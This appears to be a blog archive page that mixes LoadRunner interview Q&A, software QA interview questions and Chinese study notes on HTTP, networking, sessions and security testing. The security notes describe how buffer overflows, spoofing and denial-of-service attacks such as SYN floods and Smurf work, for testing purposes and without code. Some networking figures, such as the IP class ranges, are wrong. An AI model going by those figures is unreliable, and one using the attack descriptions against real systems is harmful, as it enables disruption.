- What are the components of LoadRunner? - The components of LoadRunner are The Virtual User Generator, Controller, and the Agent process, LoadRunner Analysis and Monitoring, LoadRunner Books Online.
- What Component of LoadRunner would you use to record a scrīpt? - The Virtual User Generator (VuGen) component is used to record a scrīpt. It enables you to develop Vuser scrīpts for a variety of application types and communication protocols.
- What Component of LoadRunner would you use to play Back the scrīpt in multi user mode? - The Controller component is used to playback the scrīpt in multi-user mode. This is done during a scenario run where a vuser scrīpt is executed by a number of vusers in a group.
- What is a rendezvous point? - You insert rendezvous pointsinto Vuser scrīpts to emulate heavy user load on the server. Rendezvous pointsinstruct Vusers to wait during test execution for multiple Vusers to arrive at a certain point, in order that they may simultaneously perform a task. For example, to emulate peak load on the bank server, you can insert a rendezvous point instructing 100 Vusers to deposit cash into their accounts at the same time.
- What is a scenario? - A scenario defines the events that occur during each testing session. For example, a scenario defines and controls the number of users to emulate, the actions to be performed, and the machines on which the virtual users run their emulations.
- Explain the recording mode for web Vuser scrīpt? - We use VuGen to develop a Vuser scrīpt by recording a user performing typical business processes on a client application. VuGen creates the scrīpt by recording the activity between the client and the server. For example, in web based applications, VuGen monitors the client end of the database and traces all the requests sent to, and received from, the database server. We use VuGen to: Monitor the communication between the application and the server; Generate the required function calls; and Insert the generated function calls into a Vuser scrīpt.
- Why do you create parameters? - Parameters are like scrīpt variables. They are used to vary input to the server and to emulate real users. Different sets of data are sent to the server each time the scrīpt is run. Better simulate the usage model for more accurate testing from the Controller; one scrīpt can emulate many different users on the system.
- What is correlation? Explain the difference between automatic correlation and manual correlation? - Correlation is used to obtain data which are unique for each run of the scrīpt and which are generated by nested queries. Correlation provides the value to avoid errors arising out of duplicate values and also optimizing the code (to avoid nested queries). Automatic correlation is where we set some rules for correlation. It can be application server specific. Here values are replaced by data which are created by these rules. In manual correlation, the value we want to correlate is scanned and create correlation is used to correlate.
- How do you find out where correlation is required? Give few examples from your projects? - Two ways:First we can scan for correlations, and see the list of values which can becorrelated. From this we can pick a value to be correlated. Secondly, we can record two scrīpts and compare them. We can look up the difference file to see for the values which needed to be correlated. In my project, there was a unique id developed for each customer, it was nothing but Insurance Number, it was generated automatically and it was sequential and this value was unique. I had to correlate this value, in order to avoid errors while running my scrīpt. I did using scan for correlation.
- Where do you set automatic correlation options? - Automatic correlation from web point of view can be set in recording options and correlation tab. Here we can enable correlation for the entire scrīpt and choose either issue online messages or offline actions, where we can define rules for that correlation. Automatic correlation for database can be done using show output window and scan for correlation and picking the correlate query tab and choose which query value we want to correlate. If we know the specific value to be correlated, we just do create correlation for the value and specify how the value to be created.
- What is a function to capture dynamic values in the web Vuser scrīpt? - Web_reg_save_param function saves dynamic data information to a parameter.
- When do you disable log in Virtual User Generator, When do you choose standard and extended logs? - Once we debug our scrīpt and verify that it is functional, we can enable logging for errors only. When we add a scrīpt to a scenario, logging is automatically disabled.Standard Log Option:When you select
Standard log, it creates a standard log of functions and messages sent during scrīpt execution to use for debugging. Disable this option for large load testing scenarios. When you copy a scrīpt to a scenario, logging is automatically disabledExtended Log Option: Select
extended log to create an extended log, including warnings and other messages. Disable this option for large load testing scenarios. When you copy a scrīpt to a scenario, logging is automatically disabled. We can specify which additional information should be added to the extended log using the Extended log options. - How do you debug a LoadRunner scrīpt? - VuGen contains two options to help debug Vuser scrīpts-the Run Step by Step command and breakpoints. The Debug settings in the Options dialog box allow us to determine the extent of the trace to be performed during scenario execution. The debug information is written to the Output window. We can manually set the message class within your scrīpt using the lr_set_debug_message function. This is useful if we want to receive debug information about a small section of the scrīpt only.
- How do you write user defined functions in LR? Give me few functions you wrote in your previous project? - Before we create the User Defined functions we need to create the external
library (DLL) with the function. We add this library to VuGen bin directory. Once the library is added then we assign user defined function as a parameter. The function should have the following format: __declspec (dllexport) char* <function name>(char*, char*)Examples of user defined functions are as follows:GetVersion, GetCurrentTime, GetPltform are some of the user defined functions used in my earlier project. - What are the changes you can make in run-time settings? - The Run Time Settings that we make are: a) Pacing - It has iteration count. b) Log - Under this we have Disable Logging Standard Log and c) Extended Think Time - In think time we have two options like Ignore think time and Replay think time. d) General - Under general tab we can set the vusers as process or as multithreading and whether each step as a transaction.
- Where do you set Iteration for Vuser testing? - We set Iterations in the Run Time Settings of the VuGen. The navigation for this is Run time settings, Pacing tab, set number of iterations.
- How do you perform functional testing under load? - Functionality under load can be tested by running several Vusers concurrently. By increasing the amount of Vusers, we can determine how much load the server can sustain.
- What is Ramp up? How do you set this? - This option is used to gradually increase the amount of Vusers/load on the server. An initial value is set and a value to wait between intervals can be
specified. To set Ramp Up, go to ‘Scenario Scheduling Options’ - What is the advantage of running the Vuser as thread? - VuGen provides the facility to use multithreading. This enables more Vusers to be run per
generator. If the Vuser is run as a process, the same driver program is loaded into memory for each Vuser, thus taking up a large amount of memory. This limits the number of Vusers that can be run on a single
generator. If the Vuser is run as a thread, only one instance of the driver program is loaded into memory for the given number of
Vusers (say 100). Each thread shares the memory of the parent driver program, thus enabling more Vusers to be run per generator. - If you want to stop the execution of your scrīpt on error, how do you do that? - The lr_abort function aborts the execution of a Vuser scrīpt. It instructs the Vuser to stop executing the Actions section, execute the vuser_end section and end the execution. This function is useful when you need to manually abort a scrīpt execution as a result of a specific error condition. When you end a scrīpt using this function, the Vuser is assigned the status "Stopped". For this to take effect, we have to first uncheck the .Continue on error. option in Run-Time Settings.
- What is the relation between Response Time and Throughput? - The Throughput graph shows the amount of data in bytes that the Vusers received from the server in a second. When we compare this with the transaction response time, we will notice that as throughput decreased, the response time also decreased. Similarly, the peak throughput and highest response time would occur approximately at the same time.
- Explain the Configuration of your systems? - The configuration of our systems refers to that of the client machines on which we run the Vusers. The configuration of any client machine includes its hardware settings, memory, operating system, software applications, development tools, etc. This system component configuration should match with the overall system configuration that would include the network infrastructure, the web server, the database server, and any other components that go with this larger system so as to achieve the load testing objectives.
- How do you identify the performance bottlenecks? - Performance Bottlenecks can be detected by using monitors. These monitors might be application server monitors, web server monitors, database server monitors and network monitors. They help in finding out the troubled area in our scenario which causes increased response time. The measurements made are usually performance response time, throughput, hits/sec, network delay graphs, etc.
- If web server, database and Network are all fine where could be the problem? - The problem could be in the system itself or in the application server or in the code written for the application.
- How did you find web server related issues? - Using Web resource monitors we can find the performance of web servers. Using these monitors we can analyze throughput on the web server, number of hits per second that
occurred during scenario, the number of http responses per second, the number of downloaded pages per second. - How did you find database related issues? - By running .Database. monitor and help of .Data Resource Graph. we can find database related issues. E.g. You can specify the resource you want to measure on before running the controller and than you can see database related issues
- Explain all the web recording options?
- What is the difference between Overlay graph and Correlate graph? - Overlay Graph: It overlay the content of two graphs that shares a common x-axis. Left Y-axis on the merged graph show.s the current graph.s value & Right Y-axis show the value of Y-axis of the graph that was merged. Correlate Graph: Plot the Y-axis of two graphs against each other. The active graph.s Y-axis becomes X-axis of merged graph. Y-axis of the graph that was merged becomes merged graph.s Y-axis.
- How did you plan the Load? What are the Criteria? - Load test is planned to decide the number of users, what kind of machines we are going to use and from where they are run. It is based on 2 important documents, Task Distribution Diagram and Transaction profile. Task Distribution Diagram gives us the information on number of users for a particular transaction and the time of the load. The peak usage and off-usage are decided from this Diagram. Transaction profile gives us the information about the transactions name and their priority levels with regard to the scenario we are deciding.
- What does vuser_init action contain? - Vuser_init action contains procedures to login to a server.
- What does vuser_end action contain? - Vuser_end section contains log off procedures.
- What is think time? How do you change the threshold? - Think time is the time that a real user waits between actions. Example: When a user receives data from a server, the user may wait several seconds to review the data before responding. This delay is known as the think time. Changing the Threshold: Threshold level is the level below which the recorded think time will be ignored. The default value is five (5) seconds. We can change the think time threshold in the Recording options of the Vugen.
- What is the difference between standard log and extended log? - The standard log sends a subset of functions and messages sent during scrīpt execution to a log. The subset depends on the Vuser type Extended log sends a detailed scrīpt execution messages to the output log. This is mainly used during debugging when we want information about: Parameter substitution. Data returned by the server. Advanced trace.
- Explain the following functions: - lr_debug_message - The lr_debug_message function sends a debug message to the output log when the specified message class is set. lr_output_message - The lr_output_message function sends notifications to the Controller Output window and the Vuser log file. lr_error_message - The lr_error_message function sends an error message to the LoadRunner Output window. lrd_stmt - The lrd_stmt function associates a character string (usually a SQL statement) with a cursor. This function sets a SQL statement to be processed. lrd_fetch - The lrd_fetch function fetches the next row from the result set.
- Throughput - If the throughput scales upward as time progresses and the number of Vusers increase, this indicates that the bandwidth is sufficient. If the graphwere to remain relatively flat as the number of Vusers increased, it would
be reasonable to conclude that the bandwidth is constraining the volume of
data delivered. - Types of Goals in Goal-Oriented Scenario - Load Runner provides you with five different types of goals in a goal oriented scenario:
- The number of concurrent Vusers
- The number of hits per second
- The number of transactions per second
- The number of pages per minute
- The transaction response time that you want your scenario
- Analysis Scenario (Bottlenecks): In Running Vuser graph correlated with the response time graph you can see that as the number of Vusers increases, the average response time of the check itinerary transaction very gradually increases. In other words, the average response time steadily increases as the load
increases. At 56 Vusers, there is a sudden, sharp increase in the average response
time. We say that the test broke the server. That is the mean time before failure (MTBF). The response time clearly began to degrade when there were more than 56 Vusers running simultaneously. - What is correlation? Explain the difference between automatic correlation and manual correlation? - Correlation is used to obtain data which are unique for each run of the scrīpt and which are generated by nested queries. Correlation provides the value to avoid errors arising out of duplicate values and also optimizing the code (to avoid nested queries). Automatic correlation is where we set some rules for correlation. It can be application server specific.Here values are replaced by data which are created by these rules. In manual correlation, the value we want to correlate is scanned and create correlation is used to correlate.
- Where do you set automatic correlation options? - Automatic correlation from web point of view, can be set in recording options and correlation tab. Here we can enable correlation for the entire scrīpt and choose either issue online messages or offline actions, where we can define rules for that correlation. Automatic correlation for database, can be done using show output window and scan for correlation and picking the correlate query tab and choose which query value we want to correlate. If we know the specific value to be correlated, we just do create correlation for the value and specify how the value to be created.
- What is a function to capture dynamic values in the web vuser scrīpt? - Web_reg_save_param function saves dynamic data information to a parameter.
Software tester (SQA) interview questionsThese questions are used for software tester or SQA (Software Quality Assurance) positions. Refer to The Real World of Software Testing for more information in the field.
- The top management was feeling that when there are any changes in the technology being used, development schedules etc, it was a waste of time to update the Test Plan. Instead, they were emphasizing that you should put your time into testing than working on the test plan. Your Project Manager asked for your opinion. You have argued that Test Plan is very important and you need to update your test plan from time to time. It’s not a waste of time and testing activities would be more effective when you have your plan clear. Use some metrics. How you would support your argument to have the test plan consistently updated all the time.
- The QAI is starting a project to put the CSTE certification online. They will use an automated process for recording candidate information, scheduling candidates for exams, keeping track of results and sending out certificates. Write a brief test plan for this new project.
- The project had a very high cost of testing. After going in detail, someone found out that the testers are spending their time on software that doesn’t have too many defects. How will you make sure that this is correct?
- What are the disadvantages of overtesting?
- What happens to the test plan if the application has a functionality not mentioned in the requirements?
- You are given two scenarios to test. Scenario 1 has only one terminal for entry and processing whereas scenario 2 has several terminals where the data input can be made. Assuming that the processing work is the same, what would be the specific tests that you would perform in Scenario 2, which you would not carry on Scenario 1?
- Your customer does not have experience in writing Acceptance Test Plan. How will you do that in coordination with customer? What will be the contents of Acceptance Test Plan?
- How do you know when to stop testing?
- What can you do if the requirements are changing continuously?
- What is the need for Test Planning?
- What are the various status reports you will generate to Developers and Senior Management?
- Define and explain any three aspects of code review?
- Why do you need test planning?
- Explain 5 risks in an e-commerce project. Identify the personnel that must be involved in the risk analysis of a project and describe their duties. How will you prioritize the risks?
- What are the various status reports that you need generate for Developers and Senior Management?
- You have been asked to design a Defect Tracking system. Think about the fields you would specify in the defect tracking system?
- Write a sample Test Policy?
- Explain the various types of testing after arranging them in a chronological order?
- Explain what test tools you will need for client-server testing and why?
- Explain what test tools you will need for Web app testing and why?
- Explain pros and cons of testing done development team and testing by an independent team?
- Differentiate Validation and Verification?
- Explain Stress, Load and Performance testing?
- Describe automated capture/playback tools and list their benefits?
- How can software QA processes be implemented without stifling productivity?
- How is testing affected by object-oriented designs?
- What is extreme programming and what does it have to do with testing?
- Write a test transaction for a scenario where 6.2% of tax deduction for the first $62,000 of income has to be done?
- What would be the Test Objective for Unit Testing? What are the quality measurements to assure that unit testing is complete?
- Prepare a checklist for the developers on Unit Testing before the application comes to testing department.
- Draw a pictorial diagram of a report you would create for developers to determine project status.
- Draw a pictorial diagram of a report you would create for users and management to determine project status.
- What 3 tools would you purchase for your company for use in testing? Justify the need?
- Put the following concepts, put them in order, and provide a brief descrīption of each:
- system testing
- acceptance testing
- unit testing
- integration testing
- benefits realization testing
- What are two primary goals of testing?
- If your company is going to conduct a review meeting, who should be on the review committe and why?
- Write any three attributes which will impact the Testing Process?
- What activity is done in Acceptance Testing, which is not done in System testing?
- You are a tester for testing a large system. The system data model is very large with many attributes and there are a lot of inter-dependencies within the fields. What steps would you use to test the system and also what are the effects of the steps you have taken on the test plan?
- Explain and provide examples for the following black box techniques?
- Boundary Value testing
- Equivalence testing
- Error Guessing
- What are the product standards for?
- Test Plan
- Test scrīpt and Test Report
- You are the test manager starting on system testing. The development team says that due to a change in the requirements, they will be able to deliver the system for SQA 5 days past the deadline. You cannot change the resources (work hours, days, or test tools). What steps will you take to be able to finish the testing in time?
- Your company is about to roll out an e-commerce application. It’s not possible to test the application on all types of browsers on all platforms and operating systems. What steps would you take in the testing environment to reduce the business risks and commercial risks?
- In your organization, testers are delivering code for system testing without performing unit testing. Give an example of test policy:
- Policy statement
- Methodology
- Measurement
- Testers in your organization are performing tests on the deliverables even after significant defects have been found. This has resulted in unnecessary testing of little value, because re-testing needs to be done after defects have been rectified. You are going to update the test plan with recommendations on when to halt testing. Wwhat recommendations are you going to make?
- How do you measure:
- Test Effectiveness
- Test Efficiency
- You found out the senior testers are making more mistakes then junior testers; you need to communicate this aspect to the senior tester. Also, you don’t want to lose this tester. How should one go about constructive criticism?
- You are assigned to be the test lead for a new program that will automate take-offs and landings at an airport. How would you write a test strategy for this new program?
-
测试活动
2008-02-22 10:57:08
测试申请书(开发部经理)---指定测试负责人(测试部经理)-----编写测试计划(负责人)----设计测试用例(负责人)----审批(测试部经理)如通过----搭建测试环境(负责人)-----执行测试(负责人)-----提交BUG及跟踪(负责人)----编写测试报告(测试人员)-----审批(测试部测试) -
web扫盲专题之入门概念
2008-02-20 17:51:48
1. http协议
除了TCP/IP协议,http可以说是最重要,且使用最多的网络协议了。本节简要介绍一下http协议的工作原理。
假设现在有一个html文件:http.html, 存放在Web服务器上,其URL为www.myweb.com/http.html ,文件内容为:
HTML 代码:
<html>
<head>
<title>http.html</title>
</head>
<body>
hello, http
</body>
</html>
现在,一个用户通过IE访问该地址,IE首先将此地址的域名通过DNS转换为一个IP地址,然后通过一个Web服务器开放的端口(默认为80,不为80需在域名后加上“:端口号”,例如www.myweb.com:81)与其连接, 然后传送一个类似这样的http请求(使用flashget等下载软件下载文件时,在详细信息里也可以看到类似的信息):
GET /http.html HTTP/1.1
Host: www.myweb.com
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE.6.0; Windows NT 5.1)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
[空行]
请求的第一行为请求内容, 表示通过GET方法向服务器请求资源,/http.html为请求资源名称,HTTP/1.1 表示使用http协议,版本1.1。然后接下来的几行称为请求信息的标头(header),其中描述了请求的一些其他信息,比如客户端浏览器标识等。最后一个空行表示请求结束。
当Web服务器接收到该请求时,服务器检查所请求的资源是否有效,且是否有相应的权限。如果没有问题,则服务器会传回类似如下的http响应信息:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thursday, March 31, 2005 17:15:23 GMT
Content-Type: text/html
Content-Length: 88
[空行]
<html>
<head>
<title>http.html</title>
</head>
<body>
hello, http
</body>
</html>
其中第一行的“200”是一个状态码,表示服务器成功完成该请求,如果不成功会返回其他状态码。Content-Type表示返回的数据类型,Content-Length表示返回的数据长度。空行表示标头结束,下面则是浏览器根据请求返回的数据内容,这里是http.html的文件内容,浏览器解析html源代码,将Web页面呈现给用户,到这里就完成了一次成功的http通信。
以上内容是Web通信的基础,就和Windows消息机制一样,你可能不会用到它,但是你必须了解它,你得知道那些高级的东西隐藏了哪些低级的内容,这样对你理解和使用那些高级的东西都有非常大的帮助:)。
2. html form
前面的http.html文件是一个最简单的静态html页面,但作为一个Web程序,它实在是太简陋了,它不接受用户输入,永远显示一样的内容。我们需要能够根据用户输入来返回相应的数据。
看下面的html代码:
<html>
<head>
<title>form.html</title>
</head>
<body>
<form method=”get”>
<input type=”text” name=”p” />
<input type=”submit” value=”submit” />
</form>
</body>
</html>
观察这段代码,其中有一个html form,其内容包括在<form>和</form>之间, 其中有一个提交按钮(<input type=”submit” value=”submit” />),当用户点击该按钮时,浏览器将html form中的所有输入提交给Web服务器,form标签的method属性指定了提交的方式,这里为get,这个get对应http请求中的GET请求方法,form中的输入均以查询字符串的方式附加在URL上, 在文本框里输入一个字符串,比如“form”,然后观察浏览器的地址栏,会变成类似 http://www.myweb.com/form.html?p=form ,这是因为浏览器发出了这样的GET请求:
GET /form.html?p=form HTTP/1.1
...
...
[空行]
假如<form>标签的method属性为”post”,即令浏览器使用post方法发送该请求,当使用post方法时,用户的输入并不是通过URL来传输的,而是浏览器将内容放在POST请求的标头之后发送给Web服务器的:
POST /form.html HTTP/1.1
...
...
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
[空行]
p=form
浏览器将用户输入使用GET或者POST方法发送给Web服务器,这个过程称为“回发(Postback)”。这个概念相当重要,在Web应用程序中经常涉及到回发。 -
第七章:软件构件与中间件
2008-02-20 16:04:09
软件复用是指在两次或多次不同的软件开发过程中重复使用相同或相近软件元素的过程。
软件元素包括程序代码,测试用例,设计文档,设计过程,需求分析文档甚至领域知识。
一般认为,构件是指语义完整,语法正确和有可重用价值的单位软件,是软件重用过程中可以明确辨别的系统;结构上,它是语义描述,通信接口和实现代码的复合体
构件分类可以归纳为3类:关键字分类法,刻面分类和超文本组织方法
构件组装技术大致可分为基于功能的组装技术,基于数据的组装技术和面向对象的组装技术
国际上常用的构件标准主要有3大流派,分别是COM/DCOM/COM+,CORBA和EJB
中间件是:
1.在一个分布式系统环境中处于操作系统和应用程序之间的软件
2.中间件一种独立的系统软件或服务程序,分布式应用软件借助这种软件在不同的技术之间共享资源
中间件作为一大类系统软件,与操作系统,数据库管理系统并称“三套车”
中间件一般分为集成型中间件,通用型中间件和底层型中间件三大层次,一般还可以细分为:通信处理(消息)中间件,事务处理(交易)中间件,数据存储管理中间件,WEB 欢迎访问西西的博客
-
第五章计算机网络基础知识
2008-02-20 15:59:13
计算机网络:是指由通信线路互相连接的许多独立自主工作的计算机构成的资源共享集合体
它是计算机技术和通信技术相结合的产物
它分为资源子网和通信子网
计算机网络的分类:
1. 按传输距离分:局域网(LAN),城域网(MAN),广域网(WAN)
2. 按工作模式分:对等网络,基于服务器的网络
计算机网络的组成:服务器,工作站,传输媒体(同轴电缆,双绞线,光纤,无线电波,微波,红外线,激光),网卡,调制解调器,中继器,集线器,网桥,路由器,网关,交换机,标准,协议
网络协议与标准:概念框架(OSI网络分层协议),事实标准(TCP/IP协议族),Windows局域网标准NetBIOS,Netware网的标准SPX/IPX协议族)
OSI七层协议:
层
功能描述
对应协议
应用层
用户接口,具体的网络应用
HTTP,Telnet,FTP,SMTP,NFS...
表示层
主要是定义数据格式,加密也属于该层
JPEG,ASCII,GIF,DES,MPEG...
会话层
定义了如何开始,控制和结束一个会谈,包括对多个双向消息的控制和管理,以便在只完成连接消息的一部分时可以通知应用,从而使得表示层看到的数据是连续的
RPC,SQL,NFS..
传输层
包括是否选择差错恢复协议,还是无差错恢复协议,这一层还在同一主机上对不同应用的数据输入进行复用,还完成数据包的重新排序功能
TCP,UDP,SPX…
网络
该层对端到端的包进行定义.为了实现端到端的包传输功能,网络层定义了能够标识所有端点的逻辑地址.为了包能够正确地传输,还定义了路由实现方式和路由学习方法,同时还定义了包的分段方法
IP,IPX
数据链路层
该层定义了在一个特定的链路或媒体上获取数据
IEEE802.3/2,HDLC,PPP,ATM…
物理层
定义了有关传输媒体的物理特性的标准
RS232,V3.5,RJ-45,FDDI…
局域网协议:以太网,令牌环网,令牌总线,FDDI/光纤分布式数据接口
广域网协议:PPP(点对点),DDN,ISDN(综合业务数字网),X.25,FR(帧中继),ATM(异步传输模式)
网络拓朴结构:
1. 总线型:顾名思义,就是指在这种拓朴结构中所有的电脑用电缆将整个网络从头串到尾.优点:所需电缆少,布线容易,单点可靠性高.缺点:故障诊断难,对站点要求较高.
2. 星型:是由中央节点和通过点到点链路接到中央节点(通常是集线器或者交换机,负责整个网络的通信控制管理)的各站点组成的.是现在用得最多的一种.优点:整体可靠性高,故障诊断容易,对站点要求不高.不足:所需电缆多,整个网络可靠性依赖中央节点
3. 环型:就是指所有站点被绕成一圈的电缆所连接起来,整个结构看起来像一个圆圈.从串接方式上看,与总线相似,但信号传递不同.环型拓朴在环中有一个控制发送数据权力的”令牌”,它在环中流动.优点:所需电缆少,适用于光纤.不足:整体可靠性差,诊断故障困难,对站点要求高
4. 其它混合型:星型总线拓朴,星型环拓朴
网络应用系统的工作模式:又叫”网络计算模式”,经历了主机模式,,C/S模式,三层结构模式(B/S结构和三层的C/S结构)
IP地址:长度为32位,分为网络号和主机号两部分
A类(N.H.H.H):前1位为0的IP, 前8位是网络号,后24位是主机号,从1.0.0.0到126.0.0.0
B类(N.N.H.H):前2位为10的IP,前16位是网络号,后16位是主机号,从128.1.0.0.0到191.254.0.0
C类(N.N.N.H):前3位为110的IP,前24位是网络号,后8位是主机号,从192.0.1.0到223.225.254.0
D类(N/A):前4位为1110的IP,特殊用途,从224.0.0.0到239.255.255.255
E类(N/A):前4位为1111的IP,保留.从240.0.0.0到254.255.255.255
子网掩码:用来计算机IP地址中的网络号部分和主机号部分.考试中一般会有子网划分的题,希望大家看看相关的资料.书中没有,我也就不在此详写了.
ARP(address resolution protocol):地址解析协议,将计算机的IP地址映射成相对应硬件地址
TCP(transmission control protocol)传输控制协议,为应用程序直接提供了一个可靠的,可流控的,全双工的流传输服务
UDP(user datagram protocoal) -
WE安全测试学习笔记(cookie&session)
2008-02-20 15:38:32
Web安全测试学习笔记(Cookie&Session)
一,Session:含义:有始有终的一系列动作\消息
1, 隐含了“面向连接” 和“保持状态”两种含义
2, 一种用来在客户端与服务器之间保持状态的解决方案
3, 也指这种解决方案的存储结构“把××保存在session里”
二, http 协议本来是无状态的,所以引进了cookie和session机制来保持连接状态
cookie与session 机制之间的区别与联系:
cookie机制采用的是在客户端保持状态的方法
session机制采用的是在服务器端保持状态的方案,由于在服务器端保 持状态的同时必须要求客户端提供一个标识,
三,关于cookie机制
Cookie 的使用是由浏览器按照一定的原则在后台自动发送给服务器的,浏览器会检查所有存储的cookie,如果某个cookie所声明的作用范围大于等于将要请求的资源所在的位置,则把该cookie附在请求资源的http请求头上发送给服务器。
存储在硬盘上的cookie可以在不同的浏览器进程间共享,比如两个IE窗口。而保存在内存里的cookie,不同的浏览器有不同的处理方式,对于IE,在一个打开的窗口上按CTRL+ N(从文件菜单)打开的窗口可以与原窗口共享cookie,而使用其他方式新开的IE进程则不能共享已经打开的窗口的内存cookie。
Cookie的内容包括: 名字,值,过期时间,路径和域
四,关于session的机制
当程序需要为某个客户端的请求创建一个session的时候,服务器首先检查这个请求是否含了一个session 标识(session id),如果有,则说明以前为该客户创建了一个session,服务器就按照session id把这个session检索出来用,一般一个cookie的名字就是类似于session ID,如果cookie被禁止的时候(cookie可以被人为的禁止),经常使用重写URL的方式,把session ID附加在URL路径后面,为了在整个交互过程中始终保持状态,就必须在每个客户端可能请求的路径后面都包含这个session id。
人们以为:“把浏览器关闭了,session 就小时了”其实不对,除非程序通知服务器删除一个session,否则服务器会一直保留,而程序一般都是在用户作log off的时候发个指令去删除session。人们之所以会产生这种错觉,是因为大部分session会采用cookie来保存session,而关闭浏览器后这个session就消失了,如果服务器设置的cookie被保存到硬盘上,或者使用某种手段改写浏览器发出的http请求头,把原来的session id发送给服务器,则再次打开浏览器,其实是可以再次找到之前的session id的。所以设置失效时间可以起到一定的保护作用。
五,关于session的一些问题
1, session何时被创建: 不是在客户端访问时就被创建,而是在服务器端调用httpservletRequest.getSession(true)时才被创建。
2, session何时被删除: A,程序调用httpSession.invalidate(),B距离上一次收到客户端发送的session id时间间隔超过了session的超时设置 C, 服务器进程被停止(非持久session)
3, 如何做到关闭浏览器同时关闭session: 严格说做不到,可以让所有的客户端页面使用window.onclose来监视浏览器的关闭东西,然后向服务器发送一个请求来删除session,但是对于浏览器崩溃或者强行杀死进程时仍然无能为力。 -
安全性测试方法
2008-02-20 13:57:15
1. 功能验证
功能验证是采用软件测试当中的黑盒测试方法,对涉及安全的软件功能,如:用户管理模块,权限管理模块,加密系统,认证系统等进行测试,主要验证上述功能是否有效,具体方法可使用黑盒测试方法。
2. 漏洞扫描
安全漏洞扫描通常都是借助于特定的漏洞扫描器完成的。漏洞扫描器是一种自动检测远程或本地主机安全性弱点的程序。通过使用漏洞扫描器,系统管理员能够发现所维护信息系统存在的安全漏洞,从而在信息系统网络安全保卫站中做到“有的放矢”,及时修补漏洞。按常规标准,可以将漏洞扫描分为两种类型:主机漏洞扫描器(Host Scanner)和网络漏洞扫描器(Net Scanner)。主机漏洞扫描器是指在系统本地运行检测系统漏洞的程序,如著名的COPS、Tripewire、Tiger等自由软件。网络漏洞扫描器是指基于网络远程检测目标网络和主机系统漏洞的程序,如Satan、ISS Internet Scanner等。
安全漏洞扫描是可以用于日常安全防护,同时可以作为对软件产品或信息系统进行测试的手段,可以在安全漏洞造成严重危害前,发现漏洞并加以防范。
3. 模拟攻击实验
对于安全测试来说,模拟攻击测试是一组特殊的黑盒测试案例,我们以模拟攻击来验证软件或信息系统的安全防护能力,下面简要列举在数据处理与数据通信环境中特别关心的几种攻击。在下列各项中,出现了“授权”和“非授权”两个术语。“授权”意指“授予权力”,包含两层意思:这里的权力是指进行某种活动的权力(例如访问数据);这样的权力被授予某个实体、代理人或进程。于是,授权行为就是履行被授予权力(未被撤销)的那些活动
l 冒充:就是意个实体假装成一个不同的实体。冒充常与某些别的主动攻击形式一起使用,特别是消息的重演与篡改。例如,截获鉴别序列,并在一个有效的鉴别序列使用过一次后再次使用。特权很少的实体为了得到额外的特权,可能使用冒充成具有这些特权的实体,举例如下。
1) 口令猜测:一旦黑客识别了一台主机,而且发现了基于NetBIOS、Telnet或NFS服务的可利用的用户帐号,并成功地猜测出了口令,就能对机器进行控制。
2) 缓冲区溢出:由于在很多地服务程序中大意的程序员使用类似于“strcpy(),strcat()”不进行有效位检查的函数,最终可能导致恶意用户编写一小段程序来进一步打开安全缺口,然后将该代码放在缓冲区有效载荷末尾,这样,当发生缓冲区溢出时,返回指针指向恶意代码,执行恶意指令,就可以得到系统的控制权。
l 重演:当一个消息或部分消息为了产生非授权效果而被重复时,出现重演。例如,一个含有鉴别信息的有效消息可能被另一个实体所重演,目的是鉴别它自己(把它当作其他实体)。
l 消息篡改:数据所传送的内容被改变而未被发觉,并导致非授权后果,如下所示。
1) DNS高速缓存污染:由于DNS服务器与其他名称服务器交换信息的时候并不进行身份验证,这就使得黑客可以加入不正确得信息,并把用户引向黑客自己的主机。
2) 伪造电子邮件:由于SMTP并不对邮件发送者的身份进行鉴定,因此黑客可以对内部客户伪造电子邮件,声称是来自某个客户认识并相信的人,并附上可安装的特洛伊木马程序,或者是一个指向恶意网站的链接。
l 服务拒绝:当溢个实体不能执行它的正常功能,或它的动作防碍了别的实体执行它们的正常功能的时候,便发生服务拒绝。这种攻击可能是一般性的,比如一个实体抑制所有的消息,也可能是有具体目标的。例如,一个实体抑制所有流向某一特定目的端的消息,如安全审计服务。这种攻击可以是对通信业务流的抑制,或产生额外的通信业务流。也可能制造出试图破坏网络操作的消息,特别是如果网络具有中继实体,这些中继实体根据从别的中继实体那里接收到的状态报告,来做出路由选择的决定。拒绝服务攻击种类很多,举例如下。
1) 死亡之ping(ping of death):由于在早期的阶段,路由器对包的最大尺寸都有限制,许多操作系统对TCP/IP栈的实现在ICMP包上都规定为64KB,并且在读取包的标题后,要根据该标题头里包含的信息来为有效载荷生成缓冲区。当产生畸形的、声称自己的尺寸超过ICMP上限,也就是加载尺寸超过64K上限的包时,就会出现内存分配错误,导致TCP/IP堆栈崩溃,致使接受方宕机。
2) 泪滴(Teardorop):泪滴攻击利用那些在TCP/IP堆栈实现中信任IP碎片中的包的标题头所包含的信息来实现自己的攻击。IP分段含有指示该分段所包含的是原包的哪一段的信息,某些TCP/IP(包括Service Pack 4 以前的NT)在收到含有重叠偏移的伪造分段时将崩溃。3) UDP洪水(UDP Flood): 各种各样的假冒攻击利用简单的TCP/IP服务,如Chargen和Echo 来传送毫无用处的数据以占满带宽。通过伪造与某一主机的Chargen服务之间的一次的UDP连接,回复地址指向开着Echo服务的一台主机,这样就生成在两台主机之间的足够多的无用数据流,如果数据流足够多,就会导致带宽的服务攻击。
4) SYN洪水(SYN Flood):一些TCP/IP栈的实现,只能等待从有限数量的计算机发来的ACK消息,因为它们只有有限的内存缓冲区用于创建连接,如果这一缓冲区充满了虚假连接的初始信息,该服务器就会对接下来的连接请求停止响应,直到缓冲区里的连接企图超时为止。在一些创建连接不受限制的实现里,SYN洪水也具有类似的影响。
5) Land攻击:在Land攻击中,一个特别打造的SYN包的原地址和目标地址都被设置成某一个服务器地址,这将导致接受服务器向它自己的地址发送SYN-ACK消息,结果,这个地址又发回ACK消息并创建一个空连接,每一个这样的连接都将保留,直到超时。各种系统对Land攻击的反应不同,许多UNIX实现将崩溃,NT变得极其缓慢(大约持续5分钟)。
6) Smurf攻击:一个简单的Smurf攻击,通过使用将回复地址设置成受害网络的广播地址的ICMP应答请求(ping)数据包,来淹没受害主机的方式进行,最终导致该网络的所有主机都对此ICMP应答请求作出答复,导致网络阻塞,比“Ping of Death”洪水的流量高出一个或两个数量级。更加复杂的Smurf将源地址改为第三方的受害者,最终导致第三方雪崩。
